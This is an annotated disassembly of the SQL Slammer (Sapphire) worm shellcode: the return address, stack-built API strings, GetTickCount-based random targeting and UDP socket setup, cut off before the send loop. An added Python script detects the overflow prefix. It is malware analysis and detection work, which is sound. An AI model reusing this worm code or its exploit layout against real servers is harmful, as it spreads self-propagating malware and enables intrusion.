I suddenly became very interested in the code of the SQL worm Sapphire. Working from the test code posted online,
I read until 4 o'clock in the morning, finally extracted the key code, and analyzed the virus for the first time.
This virus is very well written. If there is any mistake, please correct me. YANGRUNHUA 2/9/03 04:30 AM. Note: the exact addresses differ between machines and versions.
0012FCED 68DCC9B042    push 42B0C9DCh          ; 42B0C9DC lies in sqlsort.dll and holds FF E4 (jmp esp); used as the return address
0012FCF2 B801010101    mov eax, 1010101h
0012FCF7 31C9          xor ecx, ecx
0012FCF9 B118          mov cl, 18h
0012FCFB 50            push eax
0012FCFC E2FD          loop 0012FCFB           ; fill loop, pushes 01010101h 18h times
0012FCFE 3501010105    xor eax, 5010101h       ; eax = 04000000h
0012FD03 50            push eax                ; the overflowing buffer, from the 04h at the head of the packet to here: 04 01 01 ... 01 01 DC C9 B0 42
0012FD04 89E5          mov ebp, esp            ; save esp in ebp
0012FD06 51            push ecx                ; ecx = 0, terminating null
0012FD07 682E646C6C    push 6C6C642Eh          ; ".dll"
0012FD0C 68656C3332    push 32336C65h          ; "el32"
0012FD11 686B65726E    push 6E72656Bh          ; "kern"  -> .string "kernel32.dll" at ebp-10h
0012FD16 51            push ecx
0012FD17 686F756E74    push 746E756Fh          ; "ount"
0012FD1C 6869636B43    push 436B6369h          ; "ickC"
0012FD21 6847657454    push 54746547h          ; "GetT"  -> .string "GetTickCount" at ebp-20h
0012FD26 66B96C6C      mov cx, 6C6Ch           ; "ll"
0012FD2A 51            push ecx
0012FD2B 6833322E64    push 642E3233h          ; "32.d"
0012FD30 687773325F    push 5F327377h          ; "ws2_"  -> .string "ws2_32.dll" at ebp-2Ch
0012FD35 66B96574      mov cx, 7465h           ; "et"
0012FD39 51            push ecx
0012FD3A 68736F636B    push 6B636F73h          ; "sock"  -> .string "socket" at ebp-34h
0012FD3F 66B9746F      mov cx, 6F74h           ; "to"
0012FD43 51            push ecx
0012FD44 6873656E64    push 646E6573h          ; "send"  -> .string "sendto" at ebp-3Ch
0012FD49 BE1810AE42    mov esi, 42AE1018h      ; address of GetDllHandle
0012FD4E 8D45D4        lea eax, [ebp-2Ch]
0012FD51 50            push eax                ; address of "ws2_32.dll", ebp-40h
0012FD52 FF16          call dword ptr [esi]    ; call GetDllHandle
0012FD54 50            push eax                ; HINSTANCE of ws2_32.dll, ebp-40h
0012FD55 8D45E0        lea eax, [ebp-20h]
0012FD58 50            push eax                ; address of "GetTickCount", ebp-44h
0012FD59 8D45F0        lea eax, [ebp-10h]
0012FD5C 50            push eax                ; address of "kernel32.dll", ebp-48h
0012FD5D FF16          call dword ptr [esi]    ; call GetDllHandle
0012FD5F 50            push eax                ; HINSTANCE of kernel32.dll, ebp-48h
0012FD60 BE1010AE42    mov esi, 42AE1010h
0012FD65 8B1E          mov ebx, dword ptr [esi]
0012FD67 8B03          mov eax, dword ptr [ebx]
0012FD69 3D558BEC51    cmp eax, 51EC8B55h      ; 55 8B EC 51 = push ebp / mov ebp, esp / push ecx: checks for a function prologue
0012FD6E 7405          je 0012FD75
0012FD70 BE1C10AE42    mov esi, 42AE101Ch
0012FD75 FF16          call dword ptr [esi]    ; call GetProcAddress for the address of GetTickCount
0012FD77 FFD0          call eax                ; call GetTickCount
0012FD79 31C9          xor ecx, ecx
0012FD7B 51            push ecx
0012FD7C 51            push ecx                ; must be 0: the last 8 bytes of the sockaddr_in struct, ebp-48h
0012FD7D 50            push eax                ; random value (destination IP), ebp-4Ch
0012FD7E 81F10301049A  xor ecx, 9A040103h
0012FD84 81F101010101  xor ecx, 1010101h
0012FD8A 51            push ecx                ; ecx = 0x9B050002: AF_INET = 0x0002, port 1435, htons(1435) = 0x9B05, ebp-50h
0012FD8B 8D45CC        lea eax, [ebp-34h]
0012FD8E 50            push eax                ; address of "socket", ebp-54h
0012FD8F 8B45C0        mov eax, dword ptr [ebp-40h]
0012FD92 50            push eax                ; HINSTANCE of ws2_32.dll, ebp-58h
0012FD93 FF16          call dword ptr [esi]    ; call GetProcAddress for the address of socket
0012FD95 6A11          push 11h                ; IPPROTO_UDP, ebp-54h
0012FD97 6A02          push 2                  ; SOCK_DGRAM, ebp-58h
0012FD99 6A02          push 2                  ; AF_INET, ebp-5Ch
0012FD9B FFD0          call eax                ; call socket
0012FD9D 50            push eax                ;
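Two things in the listing are worth checking by hand from the defender's side: how the two XOR constants turn a zeroed ecx into the sockaddr_in family/port header, and what a packet filter or IDS rule would key on to flag the overflow prefix (a 04h lead byte, a run of 01h fill bytes, then the sqlsort.dll return address DC C9 B0 42). The Python below is an added example and not the author's code. Its constants come from the listing above; the 96-byte fill length in the constructed sample and the MIN_FILL threshold are assumptions, since the listing shows the fill but not its exact length, and the sample datagrams are constructed, not captured traffic.

```python
"""Check the sockaddr_in decoding and the overflow-prefix pattern described
in the Sapphire listing (added example, not the author's code)."""
import struct

# The two XOR constants from 0012FD7E / 0012FD84; ecx is zero before them.
XOR_A = 0x9A040103
XOR_B = 0x01010101

# Return address pushed at 0012FCED, as the bytes appear in the datagram.
RET_ADDR_BYTES = bytes.fromhex("dcc9b042")

# Minimum run of 0x01 fill bytes before the return address for a match.
# Assumed threshold: the page shows the fill but not its exact length.
MIN_FILL = 64


def decode_sockaddr_header(xor_a: int = XOR_A, xor_b: int = XOR_B) -> tuple[int, int]:
    """Reproduce 'xor ecx, A; xor ecx, B' on a zeroed ecx and read the pushed
    dword the way sendto() does: bytes 0-1 are sin_family in host (x86,
    little-endian) order, bytes 2-3 are sin_port in network order."""
    ecx = (0 ^ xor_a ^ xor_b) & 0xFFFFFFFF
    raw = struct.pack("<I", ecx)               # dword as laid out on the stack
    family = struct.unpack("<H", raw[:2])[0]   # AF_INET == 2
    port = struct.unpack("!H", raw[2:4])[0]    # network byte order
    return family, port


def overflow_prefix_match(payload: bytes, min_fill: int = MIN_FILL) -> bool:
    """True when a datagram starts with 0x04, then at least min_fill 0x01
    bytes, immediately followed by the sqlsort.dll return address."""
    if len(payload) < 1 + min_fill + len(RET_ADDR_BYTES) or payload[0] != 0x04:
        return False
    i = 1
    while i < len(payload) and payload[i] == 0x01:
        i += 1
    fill_len = i - 1
    return fill_len >= min_fill and payload[i:i + 4] == RET_ADDR_BYTES


def scan_datagrams(datagrams):
    """Indexes of datagrams that match; what an IDS rule keyed on the prefix
    would alert on when run over UDP payloads."""
    return [n for n, d in enumerate(datagrams) if overflow_prefix_match(d)]


# Constructed samples, not captured traffic.
# 1) The prefix the author describes followed by the first instructions of the
#    listing; the fill length of 96 is an assumption for this sample.
SAMPLE_MATCH = (b"\x04" + b"\x01" * 96 + RET_ADDR_BYTES
                + bytes.fromhex("b801010101 31c9 b118 50 e2fd 3501010105 50 89e5"))
# 2) A normal SQL Server Resolution Service ping is a single 0x02 byte.
SAMPLE_PING = b"\x02"
# 3) Same 0x04 lead byte but a short fill and no return address: a benign
#    instance-name lookup shape, so it must not match.
SAMPLE_SHORT = b"\x04" + b"\x01" * 8 + b"MSSQLSERVER\x00"

if __name__ == "__main__":
    fam, port = decode_sockaddr_header()
    print(f"sin_family={fam} (AF_INET is 2), sin_port={port}, "
          f"on the wire: {port.to_bytes(2, 'big').hex()}")
    print("matching datagrams:", scan_datagrams([SAMPLE_MATCH, SAMPLE_PING, SAMPLE_SHORT]))
```

Running it prints sin_family 2 and sin_port 1435 with wire bytes 059b, which agrees with the comment at 0012FD8A, and flags only the first sample. The detector deliberately requires the return address right after the fill run rather than anywhere in the packet, so a legitimate instance-name request that happens to begin with 0x04 and a few 0x01 bytes is not reported.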